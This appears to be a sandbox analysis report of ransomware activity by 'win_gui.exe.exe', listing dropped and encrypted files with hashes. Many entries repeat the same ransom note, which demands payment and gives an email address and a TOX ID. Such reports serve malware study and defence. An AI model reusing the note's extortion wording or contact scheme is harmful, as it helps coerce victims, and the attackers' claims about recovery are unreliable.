                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Resources\1033\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Resources\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\vfs\System\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\vregwow6432\office.x-none.msi.16.x-none.vreg.dat

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1835616
                                Entropy (8bit):5.449303450297782
                                Encrypted:false
                                SSDEEP:24576:7mQ0JlVkITxwioiEDH3i+Hj1D+fnuEVW2UF8:7X0JliIDoxDXR4fnn7UF8
                                MD5:5F3DB0257DB5BEC996BE65DE136CE8D8
                                SHA1:86EC10C9C63A2D30E116F51213D723E2C270928D
                                SHA-256:290F22C4695AC005C1648B37C85C28CD058B54B0753F0518C7976BDA3147A147
                                SHA-512:31655D28217622FDB2D6ED4EF7AA25C1126437D9136500945EC41A6BFD351060169744F22F328A81387E4417C4149F23ABEB9CA1ECEE57D33F9A3FB501AD329D
                                Malicious:false
                                Preview:Q...a...F._U.....8....J.Br ,).{...I..-z.R.e]6..}.1.1.....Q.q.[.BE..:>.r..;.......O.C..[<h;sl.9.5.1d....9...H>4rOO..Nt..}.O$Mc.)qR..,.f,.2.._.....g,-8--...........:L.... !....L..}#h t.;...*.C.....>...t.jj..QLFY..N.h.W.4.Y.1...VA8.`.P..D.....T.........@Br..8Z/TM.~p..I..:D..G2N|.V....w...%.....l....>.Ae+.c...Fp|..f....a.....fBFv..z.~.........[f...k.\\i.JJ..q..Hk.zZ....G....a....yD..........'.^.B..w..q\~zy...(....P>M..<.u.BP .9.......IknX).~..5[....A".P...8..=GTb.........2.C.TT........E.Sr.y..K..H..."R.Y0.}...^k.i.\..,..M....W....."c.'.1S|Gh..4.....q6.u..xy..[...bv...NH.....i.........;..n.%L...xOeB.i./.[?.B-....e.q.......R).o...A...:...t.....Q.H4....Gnwi..ih..4}.j.h..%..4..i.X.3,.\Xw.j.p...b.vqT..C....W!.....S.Q.2..]/D.2...sX...a.c/.P.(..S..6..Q]B..kZ)+xR..`.......>-....8.J5.b........2........~.Uy.A...y..h...}A....R.o}...l'.P.....#..a.."U...JX..S`<[.W...4....ti>..J]!s$.L.."...S.!.P.C;.....Z.:..L.T.G.....?...S... .......T.....$..$0@.a@....x.....c.^....

                                C:\Program Files (x86)\Microsoft Office\root\vregwow6432\office64mui.msi.16.en-us.vreg.dat

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):33376
                                Entropy (8bit):7.993690549160133
                                Encrypted:true
                                SSDEEP:768:zx6DE4qiCbOX/a/JGXyz1uhCm4W/01XZ9yzoKYh/2xM0:N8ZnCiqJXc7n0Pyzo14xx
                                MD5:49B37FA72913A19605D45FACB470F8ED
                                SHA1:F34096EE71BD4D783834241D7F1187E9675471C6
                                SHA-256:9DEC9A84B64739BFC18091DA4263DACACF60079DEE309293BA81403D18341DE5
                                SHA-512:9980931FE564BAC39C0895CC65C508ECAF07F7519CEC4E324139EC93158BD3148E8A5183E3F4197614494A7EAF5E65CDBA461EC9E3ECDEFD50224595F1E2F7E0
                                Malicious:true
                                Preview:.5.~.Z9.F.c!.O.......z..~.(..!.k..`..f..q.D8?........<..Y4.{.&G..K<..........B..F.X.J.7....#.j.a......a.9..9..\..#.v.....8uz..Y..%.!\.x."=....A. .....k..*.G.......V..?.=..Tzp.7.A.O.G..*..K...'.].$yW10...&...^Y..3l..6maj.J.G......"U....|..g.P.o..ucz.L....Un.*.......d......5...f._8S.Qv.^.a...P.........t1...)..l...[....WZ5C..q4]b.._".x..^.......>...."w.V^...Ph.....2X...a..AG.jR..y|._.xQ..B..xPKLq,..P..{./.(.q...e....Q..0aJ.X.4..'h..... ..Kp...w5...5k..D..W.9...,..f...lC..T.'.c9....w.....<7.C[...1.|..E. .....%u.D.w/.....N...."...W.\...r....#.q..{`;..9eHn. ..ji.a......'P...S|.Z..w.U+......r.....".h.".].....-...t...yx..........t.L...J.).6..CM.5..Q.........".....M..T....q.}p_.X...Cs..c.}..?...+<........f.l.U..:$..>.P..k.O......S.su..r....+..q..ILL...C.1:...D3sB...g.%..g.=!. ..r.Y..u<.......h....I.xk..Y..#5XZ.....s.|...A.....2.I..B..0~.\.....s..C.HV5.._...w..d8.x..../.T.]...).Sh*.5...#.q.9.V.w7..".M..1....bK.c.....wX..9.|.r....^.u.k.

                                C:\Program Files (x86)\Microsoft Office\root\vregwow6432\officemui.msi.16.en-us.vreg.dat

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):524896
                                Entropy (8bit):6.861562429617699
                                Encrypted:false
                                SSDEEP:6144:OStIehZz64JFcG4Mql+jS/H68uQ9gVf4ibgBerd8GQZ2sBnIjmjnY4cG2:NhZz64ncICH68u4afPYXZvHjY1l
                                MD5:4F0E24439C8E262637F04B87E8A6C962
                                SHA1:81B655FD14F694781C0A162818C15DD78B1C759A
                                SHA-256:D5AB31FFFAA6B4BD77DD9E9A36E3A83DF00AFB96D4AB2601E5A373067880E987
                                SHA-512:993E268D54012636D645E4F85420F47CFA47A65F21EB80A77F98875F9EB715DE5BA0960736B01134AFE7C56CF8D7CD5EA903C74F1CBBC41E1202202BA251A489
                                Malicious:false
                                Preview:..@I.z....a.a>A..[.....8.~(6........,.k..=2..L.W...yQ....b....}..8.kL......Z).P.2.h..9.4L.=..xv....rk)...Nz.g..<.P~....@.b...+Sg(h..d.=.]O#.........Al!...}C.D..,)6&._)t..5..YH..R.j..s..t..z`o.\.Iy~..CY.@|sU.K..ZT..G......~...i\A..p...g-SR;.....{U..C...y.....7....y..k.....h.A....7.tb#.H:%3.,...t)l<..5.s2#e...x..;..Aw.W.<...i*...Rs.".m"s.,mx.."X?z..=........iOh.....6b....w..Wa3.qj..C.......K......+~...m#6.6sY..H.%L$.h5.....2..t..]..F...ob/_P.P.)\.....^=.....^h."^9Y...=48..'J....:......w...{.6..:Kw\.....V.0.a....'O.).#.C.=G._.e........O.LH....).5.[......a.LQ..!*y.........QS$F.p..,j3N.=(.B..-..W...\o...;Cl........{h..z$}A..........2lI.C.....n.YAen...627...-.....0...*>0p.db..2.`/.i..({.....`\....."..4o.....@^z..K.p.VP.......74-.|.~.....s..fq..t.75.b`.#.%,1.Y.._|.W.......v X.|..Ml#gQu..W+5.N..":.s.8ugNq.*..y/.X.........5X....<...r'..)|eJ.o...6...y....7.^..c|noF.k.}==._..R0./...}..n.S.p@....w..(.8.....L..-.pc ..TA.S7...4...:O`$.r.US.!.......

                                C:\Program Files (x86)\Microsoft Office\root\vregwow6432\onenote.x-none.msi.16.x-none.vreg.dat

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):262752
                                Entropy (8bit):7.999367826948063
                                Encrypted:true
                                SSDEEP:6144:IZNdZdJtxADrmXPRiyaKDUauCDHFP1sayRhS5yqYju0BBFJpA:IZNHj5aKDUaP/oRqSjuQJy
                                MD5:06FBA08C2F6B99E394642F91601CBEE1
                                SHA1:917625C2407D1AB7B470C7BB51748540848200A9
                                SHA-256:63BE3326743630A270D9FD9BB6B5D578779C3F925F5C6CF0448F454D8D569C14
                                SHA-512:947E1EA378BFE394890B08EAA726C7E1DD6EAD5BDF26500B62DBF2E46FCE27E784A81827928849EC3C202AC708A77E501E624B9031562DA0ED352E5FA7DCBBA7
                                Malicious:true
                                Preview:Ag.-8.g..O5i...e..>.K...p....I.... ..}.V..Sl...g...Vz....[.b.......-w... lIM....~....."...[...Q.Q.Wn;zS.o.......n..S..+1...g.](}...(l~...8s.3-L.G.....I...].lD.R...$....G...... .P!...*1....5Ijl(..S...g..2....:.Zz....ks...A?.(5....~.4.L..l.@.l[.Y._..#....)I=-..1..&VqA....0..^O.........P.b....N.~}.g<vW....:...u%b...mJ.*:.$..;\.8.Q......D...._dL'..,U..d...piJ.U^..X.~I....Q.a...._.o.[..t.[3.8'...:ode...U...m.,x....&.j.zU.n.9U7*..EV......$..,.K.:.G>...Y...)k........sV/9S.....3]..VI.i..i..G.~.daP;...SC....']....G|Ua.R.L..).C..|.C..N....].N..`.'.......H..]..|*Am.-..X.70?.W.yxC.W..hRl.Z.....U8nJ..7...s.^......e.k..;C{K.zja*,..S..|..@...l....Y.V.?..$.+..*.....[.....o1p.M.....7.p..E!....DZ>.{..........3#C...&.e...lP.....A.9=......R..S..4M<}..nv.+..L.q.#..9)....;..,jKw..n...d.l.D /6.[^.Q...$...u\Lz!X{........B......2.O....p...I\Z.....T..^12.r.....z..]...._1&....T...t;r.x......_.m...d...v.uvz.......'..3>j...EH..D...."nn.x....j.....Sy....`-.

                                C:\Program Files (x86)\Microsoft Office\root\vregwow6432\onenotemui.msi.16.en-us.vreg.dat

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):33376
                                Entropy (8bit):7.993995561940174
                                Encrypted:true
                                SSDEEP:768:qi0vWkEyFJ6BDv7wopSdwx74vEea6axIrD39h0w:qi0vkyFoBDzwZK+E8sIvDN
                                MD5:A66B3A13DB79977E06C9001026083671
                                SHA1:F764E894545952264CE414223BA17C347936848C
                                SHA-256:1FAEEDCEAE89BB645AC9A51BE197710FCEC3F11430BB9566C06DB4B5C801D6BA
                                SHA-512:CC13546AEBF3A2A26A567FBA3B8A962A6CAD86758DB281AF4DDFE050E21197976F0889A1E7270848B4A8F97372931DF14D505CCBADABBC6D420F0AB0B20775CB
                                Malicious:true
                                Preview:.@:..m.LG?..L....r.+.<..Ey.X...,.,.[....*.d.L. .u...`?.\G.N...w;..*Xv,...V..Q..pY....r....#....=i.x.R.h........cCn..].......\..@..Fq.a&....G5...+......Vq..K...?.>.u..\.R<.u.I.:..X0.....Q..[a.6/+.W&N.6..,<jd-..t.T...........Q.c.g..h.#F.B.r.c.h.[..9K..I,.-4....P:A..!z.#.8.A...3...r.......?...o.k......]..%..w...p....n.7.eh.......p.^99+7)v).EK..t.....;...e...K(.......vl#y...9..k.gw...3...Bc;.. .....h..+k...P./CP..H.!d.V..[......n.....1m.^.....uQ.P.2...f.[...aX....h.Y/..|...&.......XZ.k.{.h...#.G.a.7T.....36......7h..{...w.)..0w!.....$S@3.......M..X7.`...tB.{z...m....Mm.E.n.`..5F$..Z.7.4..+.....2.ta.L.m...w..M...........2....)............n..N...]l...?........x`.~..I..C.%'.'}...!.8.Q.|.9P.*-.q.5...AKR.ov/8r.b..........;~.4..T%..H..P#.'K.....M.A.w...p.sA..j....4...j%......4S....t.U..XV(.....lXj..k.$"......#....&.D2.D...........X"...R.7......c.......S.......9......."V....\.._.t..%..K.ww.5...d..U.<M/...}....a....}..-I+.9t.lN.{`..v...m..

                                C:\Program Files (x86)\Microsoft Office\root\vregwow6432\osm.x-none.msi.16.x-none.vreg.dat

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):16992
                                Entropy (8bit):7.988851095684504
                                Encrypted:false
                                SSDEEP:384:4SHivq1dz0VLw1cRnhYd6hJHwt4g7rzpvLoOvSrD7X+VOa:dHinwG5hYd6hpqrzVgX7m
                                MD5:2A872608FA94BF72F34B17E728EF7D61
                                SHA1:3A966CC80CD5259D0323D01E05C619CA271840C0
                                SHA-256:CE85B3B45176D6D79EEB9A3CF429602939E0DE4800A68ED5E144F382C1CE30D6
                                SHA-512:10EEC56A69AAAC53CA3CCE6715432F676A99C4D6CF22C3213E47722F1955B1875EC2701BAA39B78340C3417BE92B305A0B61475C8049241F30AEB19A7064DDD6
                                Malicious:false
                                Preview:...N1..S...H.......Q.8.....|Q.e.:L.K&u"..Q.. ...u...>..F...6k...A55..2^J.......1r.*....2H..7-.;_b.6........o...4X.g.!..=N....D._..x.......5.0..a.P|..@..........47......W..../.:....D:p.t..@....H...rZ0L.d.t..P...dm. .L.m..!...$.._a....%.etj..~.?...q[.?._Q......B..k\)....].....J. ...V....:p...R.B.*l..P4.....0.I...w.j.........14..H...w.o.d,1cge..I.m.K~Yp...vf..P.N.Sb:...U.N[W.U.U+I`.C_.K....Kh.J...|).0.~.....+.T......(1..P..6L..6~......Q.~........N.>.b.e..i4...hdxZ.F..WD...i..m..oU.O/....v.$.U.......,4.....pM.......u.&^.....tH....c(.`_.....%...at*....;?f..|..F8W4j.td..m..\.|....._@.. ..&#.._p.2}....-eL(.E.\.Xq.v.. .lP.F[.vNI.D..D..%<.o].Sjp.R...'..^...Y...~,.:.xr.......?........Hi.;l.p....`4S5.I../.d$..(..H...`..C......h...kc..eg....6.._.....8.\.&.&..........m......b.....v..>+..e..@......P.S....x........S....^...._0..#ck..7^..d..JcGr.....rg...9.w:-~.....wS.#.,e......1...y.L....e....2].r.r..A.....42g..{...<..S....0..nglv...m.oQS...bC.<`..

                                C:\Program Files (x86)\Mozilla Maintenance Service\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):104002
                                Entropy (8bit):7.9980319293466735
                                Encrypted:true
